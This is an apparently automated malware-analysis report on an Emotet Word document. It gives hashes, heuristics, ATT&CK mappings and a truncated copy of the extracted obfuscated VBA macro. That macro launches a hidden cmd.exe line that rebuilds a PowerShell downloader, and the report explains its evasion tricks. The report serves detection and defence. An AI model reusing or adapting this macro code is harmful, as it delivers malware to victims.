Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 5a5ce709e2d67546…

MALICIOUS

Office (OLE)

Size: 91.5 KB
Created: 2018-08-02 07:09:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: f7e55de148319028c87fdc6fa6e82814
SHA-1: d0483db790c8a42a934439fe8e835d3dc0c02bc0
SHA-256: 5a5ce709e2d675468472824dce7e16e71d67eb90706dcf0dda28e67ba0220ae3
Risk score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file contains a VBA macro with an AutoOpen procedure, a common indicator for malicious documents. The ClamAV signature explicitly identifies it as Emotet, a known downloader family. AutoOpen calls Shell (written as `Shell@`, a type-declaration suffix that does not change the call but defeats naive matching on `Shell(`) with a window-style argument of 580251827 - 580251827 = 0 (vbHide), so the command runs in a hidden window. The command line is assembled by concatenating the return values of several functions, each of which builds its fragment from many short string literals. The fragments visible in the preview form `cmd /V:O/C"set x28L=<78-character alphabet>&&for %D in (61,74,50,...`: a cmd.exe line that enables delayed variable expansion (/V:O, accepted as an abbreviation of /V:ON) and then walks a list of indices into the alphabet, the standard Emotet scheme for rebuilding a second-stage command one character at a time (the do-body of the for loop lies beyond the truncated preview). The scattered AppActivate calls with random arguments are padding; with On Error Resume Next their failures are silently ignored. Decoding the visible indices against the alphabet yields a PowerShell downloader that splits a list of URLs on '@' and builds an .exe path under %TEMP%, which is typical Emotet behaviour.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-6803955-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6803955-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The generic description of this heuristic states that no modern VBA project was recovered and no stronger macro-virus family marker was present; that does not hold for this sample, where a VBA project was recovered (macros.bas below) and ClamAV names the family, so here the finding duplicates OLE_VBA_AUTOOPEN. On its own it is analyst-facing evidence of old Word macro execution surface, not a downloader or parser-CVE attribution.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace URI that Office writes into embedded drawing parts; it is not a network indicator and should not be blocklisted. The download URLs used by this sample are not present in cleartext anywhere in the file: they only appear once the index-encoded command string built by the macro is decoded.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  5654 bytes
SHA-256: d4c230babd4acd805a1aa4db0b2dd430e0cb869655d01d08ef6e5cba3c58bbf6
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "sDOZivbn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate wBPlM
   AppActivate 2879
   AppActivate Hex(NoPWBD)
   AppActivate Sgn(GGVzB)
   AppActivate CSng(28893 + KzluMZ)
Shell@ CVar("cm") + OMbBwQUYnZAhjs + UctCBAcBmcE + NZwBAP + MVNYwp + KsMaLTjBlU + EWibjRcwwOk + WMjXjSfhh, 580251827 - 580251827
   AppActivate mKiIIo
   AppActivate ChrB(JGYhJa)
End Sub


Attribute VB_Name = "sBFWiOvbYOpsi"
Function NZwBAP()
On Error Resume Next
AppActivate 4652
   AppActivate CInt(pOnRI)
KJAzDljQ = "d /" + "V:O/C" + CStr(Chr(itdGiziA + ijjNAUZrCRBqkY + 34 + wGjwVIKSchcVB + DTIiZnnI)) + "s" + "et x28L=" + "jkHlL" + "JzFTWVO" + "Qz"
AppActivate Round(1)
   AppActivate 9
HUGjV = "hzXBmUhjjH" + "kR\5PvK@" + "n-9i" + "'0uy1" + ".}6" + "a" + ") " + "="
AppActivate 420444513
   AppActivate CBool(siuLLl - IwtUr + jiPVtd / 35839)
ctcPzGiAi = "sfw38/gN" + "x" + "Z(:qp+Gtdb" + "$r;DCeco,{" + "S"
AppActivate Tan(ZcsBo)
   AppActivate Sin(wbczY)
   AppActivate Hex(1)
SNEdEUIaXuj = "&&for %D " + "in (6" + "1,74," + "50,72," + "68,4" + "8,20,72,3," + "3,46,67,6"
AppActivate Chr(isOKf + 21139 - BMRAo / biVCVR)
   AppActivate CLng(97)
   AppActivate CBool(wOFwtv - 77527 + 53179 - vunlU)
GFrVfK = "6,22,6" + "0,47,32," + "72,50,3" + "3" + ",74" + ",66,22" + ",72" + ",73," + "64,46,55" + "," + "72,64,41" + ",9,7"
AppActivate WFXHi
   AppActivate Round(XIzUB)
ihtDrZlBAqw = "2,66,71,3," + "3" + "5,72," + "32,6" + "4,69,67,68" + ",17" + ",65,47" + ",36,20,6" + "4,64,61," + "59,53," + "53,2"
AppActivate 6
   AppActivate 4730
   AppActivate QRDju
dcBwWHi = "4,20,44,3" + "2,44,32,65" + ",18,38" + ",72,1" + "5,1" + "5,35," + "32,41,73," + "74" + ",18," + "53,25,"
AppActivate 946
   AppActivate CByte(UQRjwm)
nzZIM = "37,17,39" + ",35,11" + ",5" + "1" + ",66" + ",3"
AppActivate Int(LKJvw * McjwVj)
   AppActivate CByte(15)
pSVwKQ = "1,20,64" + ",64,61,5" + "9,53,53," + "61,4" + "4,68,35" + ",48," + "72,3,41" + "," + "6" + "1,3," + "5"
AppActivate CStr(23966 + hMnmHl)
   AppActivate ChrB(NVRlt)
tiBNbNpOsd = "3,5,7" + "4,1" + "1,56,19,7" + "7,5" + "7" + ",15,31,20," + "64,64"
NZwBAP = KJAzDljQ + HUGjV + ctcPzGiAi + SNEdEUIaXuj + GFrVfK + ihtDrZlBAqw + dcBwWHi + nzZIM + pSVwKQ + tiBNbNpOsd
   AppActivate ChrW(KGfwk)
   AppActivate CFHulw
   AppActivate 543
End Function
Function MVNYwp()
On Error Resume Next
AppActivate YMtdcl
   AppActivate Atn(2617)
oQUksbuj = ",61,59,53" + "," + "53,35,18" + ",7" + "2" + ",54,35,73" + ",44,41,73" + ",74,18,53," + "56,2" + "3,63,34,4" + "0,1" + "7,31,"
AppActivate CByte(143549204)
   AppActivate Tan(414)
VVociqMmj = "20,6" + "4,64" + ",61,59," + "53" + ",53,22,65," + "7" + "3,44,41,35" + ",32"
AppActivate Round(rHdiD)
   AppActivate CDbl(wTjSub)
ICTEz = ",53,73," + "38,52" + ",48," + "20,24" + ",50,3" + "1,20,64,64" + ",61," + "59,5" + "3,53,73,7" + "4,32,4" + "8,74" + ",68,73,"
AppActivate DomMT
   AppActivate icinM
   AppActivate aMARG
YAHFR = "35,74," + "48,48,72" + ",6" + "8,6" + "8,44" + ",54,44" + ",38,73," + "20,44,41,7" + "3,74," + "18,41,66" + ",68,53,43," + "43,64,19," + "10,36,41"
AppActivate 4069
   AppActivate Sqr(63420 * RzEdaj)
luibthqAY = ",77,61" + ",3,35,64,5" + "8,36,31," + "36,45,69" + ",6" + "7,22,19,3" + "8," + "46" + ",47,46," + "36,43,27"
AppActivate Cos(IuFaQs * vCSCtZ * CjiHO * IJOvoW)
   AppActivate Tan(jAdzp / fXzOW)
CGQkUKMiZWw = ",27," + "36,69,67" + ",18" + ",29,64," + "4" + "7,67," + "72,32" + "," + "29,59,64," + "72,18," + "61,62,3" + "6,26,36,6" + "2,67,22"
AppActivate 9160
   AppActivate wBiBr
   AppActivate wwbmk
HVNjKCMiA = ",1" + "9,38," + "62,36,41" + ",72," + "56,7" + "2" + ",36,69,4" + "9,74,68,72" + ",44,73" + ",20,5"
MVNYwp = oQUksbuj + VVociqMmj + ICTEz + YAHFR + luibthqAY + CGQkUKMiZWw + HVNjKCMiA
   AppActivate Round(57721 - EmECNE)
   Ap
... (truncated)